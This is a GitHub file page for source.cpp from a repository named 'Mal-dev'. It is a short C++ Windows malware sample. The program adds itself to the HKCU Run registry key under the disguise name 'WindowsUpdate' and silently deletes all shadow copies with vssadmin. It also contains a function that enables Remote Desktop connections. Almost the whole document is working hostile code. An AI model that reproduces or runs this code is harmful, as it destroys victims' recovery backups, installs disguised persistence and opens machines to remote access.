forked from bilalaniq/Mal-dev
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathsource.cpp
More file actions
52 lines (33 loc) · 1.07 KB
/
source.cpp
File metadata and controls
52 lines (33 loc) · 1.07 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#include <windows.h>
#include <stdio.h>
#include <shlobj.h>
void AddToRegistry()
{
HKEY hKey;
const char *path = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";
char exePath[MAX_PATH];
// 1. Get current executable path
GetModuleFileName(NULL, exePath, MAX_PATH);
// 2. Open the "Run" registry key under HKCU
if (RegOpenKeyEx(HKEY_CURRENT_USER, path, 0, KEY_WRITE, &hKey) == ERROR_SUCCESS)
{
// 3. Add a new value "WindowsUpdate" with exe path
RegSetValueEx(hKey, "WindowsUpdate", 0, REG_SZ, (BYTE *)exePath, strlen(exePath) + 1);
// 4. Close handle
RegCloseKey(hKey);
}
}
void destroy_shadow_copy()
{
system("vssadmin delete shadows /all /quiet");
}
void create_remote_desktop()
{
system("REG ADD HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f");
}
int main()
{
AddToRegistry(); // Add to startup registry
destroy_shadow_copy(); // Destroy shadow copies
return 0;
}